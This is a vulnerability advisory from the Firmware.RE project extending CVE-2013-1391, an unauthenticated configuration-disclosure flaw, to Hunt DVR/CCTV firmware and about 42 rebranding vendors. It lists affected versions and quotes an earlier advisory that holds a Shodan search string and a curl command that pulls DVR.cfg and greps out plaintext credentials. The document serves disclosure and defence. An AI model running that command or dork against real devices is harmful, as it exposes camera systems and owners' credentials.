Title: Multiple DVR/CCTV/IPcam Manufacturers Configuration Disclosure - Original CVE-2013-1391 extended to Hunt, Huntelec plus around 40 vendors customizing Hunt products References: ACSA-2013-022 (extends the impacted vendor/product of CVE-2013-1391) Timeline: xx Nov 2013 - Vulnerability discovered in more vendors/products than originally stated in CVE-2013-1391 21 Nov 2013 - Vendor notified, fix and disclosure timeline proposed to the vendor (also, as part of ACSA-2013-009/CVE-2013-5652) 22 Nov 2013 - Vendor replies "Hunt is a ODM manufacture , if we hope to do any change. We need to let our customer know. I will let them know it. When we get the response we will let you know our solution." 13 Dec 2013 - Follow-up with the vendor 12 Oct 2014 - Public disclosure Related references: ACSA-2013-009 CVE-2013-5652 Author: Andrei Costin of "FIRMWARE.RE" project andrei@firmware.re andrei@andreicostin.com Vulnerability discovered using "FIRMWARE.RE" platform/service Vendors (main, white-label): Hunt (http://www.hunt.com.tw/) Vendors (customizing/marketing, by firmware code): SV: SVAT (http://svat.com) ES: http://www.oceancctv.com.tw/mypage.php?id=2 AZ: http://www.cctvthailand.com/index.php?mo=21&list&hotdownload&p=4 http://hiview.igetweb.com/index.php?mo=21&list&newreleases&p=7 http://webcache.googleusercontent.com/search?q=cache:m-OAI7hvGRwJ:www.hiview.co.th/index.php%3Fmo%3D21%26list%26catid%3D7946+&cd=1&hl=en&ct=clnk&gl=fr&client=ubuntu LI: http://www.meritlilin.com/en/support-download.asp?c3#c3 http://www.lilin.tv/downloads http://www.lilin.co.uk/ http://www.meritlilin.com/en/livedemo.asp https://www.google.fr/search?client=ubuntu&channel=fs&q="LI2.1.93" https://www.google.fr/search?client=ubuntu&channel=fs&q=DVR216-LI2.1.93.zip http://www.generalfiles.biz/download/gs497df0ddh32i0/DVR216.zip.html Affected firmware: The list of affected firmwares is attached (470 unique software version, across approx 42 vendors deriving from hunt.com.tw generic/white-label brand) AM1.1.17 AM1.1.42 AM1.1.45 AM1.1.52 AM1.1.62 AM1.1.67 AM1.1.69 AM1.1.72 AM2.1.75 AZ1.1.17 AZ1.1.20 AZ1.1.24 AZ1.1.26 AZ1.1.29 AZ1.1.45 AZ1.1.50 AZ1.1.61 AZ1.1.67 AZ1.1.68 AZ1.1.70 AZ1.1.80 AZ2.1.71 AZ2.1.72 AZ2.1.76 AZ2.1.77 AZ2.1.78 AZ2.1.81 AZ2.1.92 CO1.1.16 CO1.1.41 CO1.1.52 CO1.1.65 CO1.1.68 D1.1.12 D1.1.15 D1.1.17 D1.1.22 D1.1.28 D1.1.36 D1.1.39 D1.1.43 D1.1.45 D1.1.61 D1.1.62 D1.1.67 D1.1.70 D2.1.71 D2.1.76 ER1.1.22 ER1.1.24 ER1.1.52 ER1.1.54 ER1.1.61 ER2.1.72 ER2.1.74 ER2.1.80 ES1.1.16 ES1.1.17 ES1.1.18 ES1.1.38 ES1.1.40 ES1.1.42 ES1.1.43 ES1.1.45 ES1.1.46 ES1.1.49 ES1.1.51 ES1.1.52 ES1.1.54 ES1.1.55 ES1.1.57 ES1.1.59 ES1.1.61 ES1.1.63 ES1.1.65 ES1.1.67 ES1.1.68 ES1.1.69 ES1.1.70 ES1.1.71 ES1.1.74 ES1.1.75 ES1.1.76 ES1.1.90 ES2.1.71 ES2.1.72 ES2.1.73 ES2.1.74 ES2.1.75 ES2.1.76 ES2.1.77 ES2.1.80 ES2.1.81 ES2.1.90 ES2.1.92 F1.1.23 F1.1.25 F1.1.29 F1.1.30 F1.1.32 F1.1.33 F1.1.35 F1.1.39 F1.1.43 F1.1.45 F1.1.48 F1.1.49 F1.1.52 F1.1.53 F1.1.60 F1.1.63 F1.1.66 F1.1.67 F1.1.69 F1.1.70 F1.1.72 F2.1.71 FO1.1.19 FO1.1.49 FO1.1.69 FO2.1.79 H1.1.27 HM1.1.51 HM1.1.70 HM2.1.72 HM2.1.77 I1.1.14 I1.1.17 I1.1.32 I1.1.35 I1.1.42 I1.1.47 I1.1.60 I1.1.61 I1.1.68 I1.1.74 I2.1.75 I2.1.81 IA2.1.80 IA2.1.81 K1.1.40 K1.1.41 K1.1.45 K1.1.50 K1.1.55 K1.1.60 K1.1.68 K1.1.75 K2.1.80 KB1.1.45 KU1.1.55 KU1.1.75 KU2.1.80 L1.1.42 L1.1.48 L1.1.61 LI1.1.21 LI1.1.22 LI1.1.25 LI1.1.26 LI1.1.27 LI1.1.28 LI1.1.29 LI1.1.30 LI1.1.42 LI1.1.49 LI1.1.51 LI1.1.55 LI1.1.56 LI1.1.57 LI1.1.59 LI1.1.61 LI1.1.63 LI1.1.64 LI1.1.73 LI1.1.74 LI2.1.71 LI2.1.75 LI2.1.76 LI2.1.77 LI2.1.78 LI2.1.80 LI2.1.81 LI2.1.90 LI2.1.93 LW1.1.32 LW2.0.02 LW2.0.03 LW2.0.04 LW2.0.05 LW2.0.06 LW2.0.15 LW3.0.04 LW3.0.05 LW3.0.07 M1.1.48 M1.1.60 M1.1.65 N1.1.49 N1.1.51 N1.1.52 N1.1.57 N1.1.61 N1.1.65 N1.1.69 N1.1.78 N1.1.79 N2.1.79 PE1.1.55 PE1.1.69 PE2.1.77 PR1.1.51 PR1.1.52 PR1.1.54 Q1.1.55 Q1.1.64 QF1.1.62 QF1.1.64 RO1.1.16 RO1.1.17 RO1.1.39 RO1.1.45 RO1.1.55 RO1.1.67 RO2.1.71 S1.1.39 SA1.1.17 SA1.1.18 SA1.1.24 SA1.1.25 SA1.1.28 SA1.1.30 SA1.1.45 SA1.1.48 SA1.1.55 SA1.1.59 SA1.1.61 SA1.1.67 SA1.1.69 SA1.1.70 SA1.1.80 SA1.1.85 SA2.1.81 SG1.1.17 SG1.1.19 SG1.1.28 SG1.1.69 SG2.1.71 SI1.1.38 SI1.1.39 SI1.1.45 SI1.1.54 SV1.1.46 SV1.1.51 SV1.1.52 SV1.1.68 SV1.1.71 SV1.1.74 SV2.1.71 SV2.1.74 SV2.1.81 SV3.1.72 SV3.1.74 TO1.1.17 TO1.1.49 TO1.1.50 TO1.1.52 TO1.1.55 TO1.1.61 TO1.1.69 TO1.1.70 TO1.1.75 TO2.1.71 TO2.1.72 TO2.1.80 TO2.1.90 TY1.1.20 TY1.1.50 TY1.1.70 TY2.1.70 TY2.1.71 TY3.1.75 U1.1.45 U1.1.67 UK1.1.67 UK1.1.74 UK2.1.72 UK2.1.77 V1.1.09 V1.1.12 V1.1.14 V1.1.15 V1.1.16 V1.1.17 V1.1.19 V1.1.20 V1.1.21 V1.1.22 V1.1.22ND V1.1.23 V1.1.24 V1.1.24ND V1.1.25 V1.1.26 V1.1.27 V1.1.28 V1.1.28ND V1.1.29 V1.1.31 V1.1.33 V1.1.35 V1.1.38 V1.1.39 V1.1.40 V1.1.41 V1.1.42 V1.1.43 V1.1.45 V1.1.48 V1.1.49 V1.1.50 V1.1.51 V1.1.52 V1.1.52ND V1.1.53 V1.1.53ND V1.1.54 V1.1.54ND V1.1.55 V1.1.57 V1.1.58 V1.1.60 V1.1.61 V1.1.61ND V1.1.62 V1.1.65 V1.1.66 V1.1.67 V1.1.68 V1.1.69 V1.1.69D V1.1.70 V1.1.71 V1.1.72 V1.1.73 V1.1.74 V1.1.75ND V1.1.77 V1.1.78D V1.1.80 V1.1.80ND V1.1.81 V1.1.90 V1.1.90ND V1.1.92ND V1.47 V1.48 V1.50 V1.51 V2.0.04 V2.0.15 V2.1.69 V2.1.71 V2.1.71ND V2.1.72 V2.1.72ND V2.1.74 V2.1.74ND V2.1.75 V2.1.75ND V2.1.77 V2.1.77ND V2.1.80 V2.1.80ND V2.1.81 V2.1.81ND V2.1.83 V2.1.84 V2.1.90 V2.1.90ND V2.1.92 V2.1.92ND V3.1.72ND V3.1.74ND V3.1.75ND V3.1.77ND V3.1.79ND V3.1.80 V3.1.90 V3.1.90ND V3.1.92ND VA1.1.28 VA2.1.79 VY1.1.66ND VY1.1.71ND VY1.1.72NDS VY1.1.73ND W1.1.39 WT1.1.22 WT1.1.28 WT1.1.45 WT1.1.46 WT1.1.49 WT1.1.52 WT1.1.58 WT1.1.61 WT1.1.62 WT1.1.70 WT2.1.72 WT2.1.75 WT2.1.79 X1.1.100 X1.1.94 Y1.1.07 Y1.1.09 Y1.1.13 Y1.1.14 Y1.1.16 Y1.1.17 Y1.1.18 Y1.1.19 Y1.1.25 Y1.1.35 Y1.1.38 Y1.1.39 Y1.1.40 Y1.1.42 Y1.1.43 Y1.1.45 Y1.1.49 Y1.1.50 Y1.1.52 Y1.1.54 Y1.1.55 Y1.1.60 Y1.1.61 Y1.1.62 Y1.1.65 Y1.1.66 Y1.1.68 Y1.1.69 Y1.1.70 Y1.1.74 Y1.1.75 Y1.1.90 Y2.1.70 Y2.1.71 Y2.1.72 Y2.1.74 Y2.1.75 Y2.1.77 Y2.1.80 Y2.1.81 YP1.1.17 YP1.1.18 YP1.1.32 YP1.1.40 YP1.1.45 YP1.1.47 YP1.1.48 YP1.1.49 YP1.1.50 YP1.1.52 YP1.1.55 YP1.1.66 YP1.1.67 YP1.1.68 YP1.1.73 YP2.1.70 YP2.1.74 Vulnerability details: From http://packetstormsecurity.com/files/119871/Hunt-CCTV-Credential-Disclosure.html **************************************************************************** Hunt CCTV (and generics brands) Insufficient Authentication January 17, 2013 - A. Ramos-- CVE ID: CVE-2013-1391 [reserved] -- Affected Vendors: Hunt CCTV (http://www.huntcctv.com/) ** generic brands from Hunt ** Capture CCTV (http://www.capturecctv.ca/) NoVus CCTV (http://www.novuscctv.com/) Well-Vision Inc (http://well-vision.com/) -- Affected Models: DVR-04 / DVR-04CH (HuntCCTV) DVR-04NC (HuntCCTV) DVR-08 / DVR-08CH (HuntCCTV) DVR-08NC (HuntCCTV) DVR-16 / DVR-16CH (HuntCCTV) CDR 0410VE (CaptureCCTV-HuntCCTV) CDR 0820VDE (CaptureCCTV-HuntCCTV) DR6-704A4H (HuntCCTV) DR6-708A4H (HuntCCTV) DR6-7316A4H (HuntCCTV) DR6-7316A4HL (HuntCCTV) HDR-04KD (unknown-HuntCCTV) HDR-08KD (unknown-HuntCCTV) HV-04RD PRO (Hachi-HuntCCTV) HV-08RD PRO (Hachi-HuntCCTV) NV-DVR1204 (NovusSec) NV-DVR1208 (NovusSec) NV-DVR1216 (NovusSec) TW-DVR604 (Well Vision INC Solutions-HuntCCTV) TW-DVR616 (Well Vision INC Solutions-HuntCCTV) Shodan dork: Basic realm="DVR" server: httpd -mini Shodan results: 46890 Vulnerable: >70% -- Vulnerability Details: You can get the entire backup config with simple GET. No authentication required. All information are in clear text: admin panel, ddns config, ppoe credentials, misc. Example: [aramosf@velouria data]$ curl -v http://x.x.x.x/DVR.cfg | strings |grep -i USER * Trying x.x.x.x... connected * Connected to x.x.x.x (x.x.x.x) port 80 (#0) > GET /DVR.cfg HTTP/1.1 > User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/ 3.13.1.0 zlib/1.2.3 libidn/1.18 libssh2/1.2.2 > Host: x.x.x.x > Accept: */* > < HTTP/1.0 200 Ok < Server: httpd < Date: Fri, 17 Jan 2013 05:47:02 GMT < Cache-Control: no-cache < Pragma: no-cache < Expires: 0 < Connection: close < Content-Type: application/octet-stream < USER1_USERNAME=iam USER1_PASSWORD=sexy Vulnerable firmware (127 different ones): - 1.1.10 to 1.1.92 - 1.47 to 1.51 - 2.0.0 to 2.1.93 - 3.0.04 to 3.1.92 -- Disclosure Timeline: 2011-09-?? - Vulnerability discovered 2012-12-20 - Published in the book "Hacker Epico" ( http://www.hackerepico.com) 2013-01-15 - CVE Assigned 2013-01-20 - Vulnerability reported to vendor 2013-01-24 - Vulnerability reported to GDT (Spain) 2013-01-28 - Public disclosure: http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html -- Alejandro Ramos www.securitybydefault.com **************************************************************************** About the author/project: Firmware.RE is part of the Firmware Genome Project. Firmware.RE is a free online service that: - unpacks, scans and analyzes almost any firmware package and facilitates the quick detection of vulnerabilities, backdoors and all kinds of embedded malware. - facilitates firmware mounting, modification, loading and emulation. - facilitates firmware vulnerability and backdoor discovery. - helps secure your embedded and internet-of-things devices.